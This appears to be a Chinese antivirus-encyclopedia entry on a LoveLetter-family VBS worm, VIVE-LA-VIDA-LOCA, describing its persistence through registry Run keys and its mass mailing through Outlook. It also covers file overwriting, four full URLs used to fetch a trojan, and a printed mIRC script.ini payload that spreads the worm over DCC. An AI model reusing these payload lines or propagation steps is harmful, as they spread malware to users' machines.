病毒依赖系统:WIN95/98/2000
1. 感染:
1. 通过.VBS文件进行感染。
2. 发作:
1.传染
2.发邮件
3. 其他信息:
1. 病毒体中有以下信息:“”
2.
4. 程序流程:
1. 病毒运行时将自身拷贝三份,以MSKernel32.vbs和VIVE-LA-VIDA-LOCA.vbs的形式将自身拷贝在WINDOWS\SYSTEM目录中;以Win32DLL.vbs的形式拷贝在WINDOWS目录中。
2. 修改注册表, 将MSKernel32.vbs文件的径放入RUN中,将Win32DLL.vbs的路径放入RUNSERVICE中,在系统下次启动时,则自动执行病毒文件,以期感染系统。
3.通过注册表找到设置的Download目录, 如果没有则将Download目录设置为:”c:\”
4.在WINDOWS\SYSTEM目录中查找WinFAT32.exe文件, 如果没找到,则生成1-4的随机数.
如果随机数为:1, 则将浏览器的默认网页设置为: http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe;
如果随机数为:2, 则将浏览器的默认网页设置为: http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
如果随机数为:3, 则将浏览器的默认网页设置为: http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
如果随机数为:4, 则将浏览器的默认网页设置为: http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
5. 如果Download目录下存在WIN-BUGSFIX.exe文件,则将默认网页设置为:” about:blank”, 并将downread&"\WIN-BUGSFIX.exe的路径放入注册表的run下.
6.在windows\system下生成一个名为:” LOVE-LETTER-FOR-YOU.HTM”的病毒网页.
7.建立一个OUTLOOK对象, 利用”MAPI”功能,建立标题为:”Ya no m¨¢s PRI”, 内容为:” Si usted es listo ya no vote por el PRI, vote por m¨a. Cuatemochas 2000.”, 附件为: VIVE-LA-VIDA-LOCA.vbs文件的信件,并检查地址本中的所有地址,将此信发出.
8.搜索本地硬盘和网络硬盘的所有根目录的文件, 判断以下文件类型:”.vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg, .mp3, .mp2 ”,如果找到此类型的文件, 则将自身覆盖写入这此文件中, 以此来扩大感染范围.
9.如果发现有:” mirc32.exe, mlink32.exe, mirc.ini, script.ini, mirc.hlp”等文件存在, 则将内容为:” [script]";mIRC Script"; Please dont edit this script... mIRC will corrupt, if mIRC will" corrupt... WINDOWS will affect and will not run correctly. thanks";Khaled Mardam-Bey";http://www.mirc.com"n0=on 1:JOIN:#:{"n1= /if ( $nick == $me ) { halt }"n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"n3=}”写入script.ini文件中。
|
|
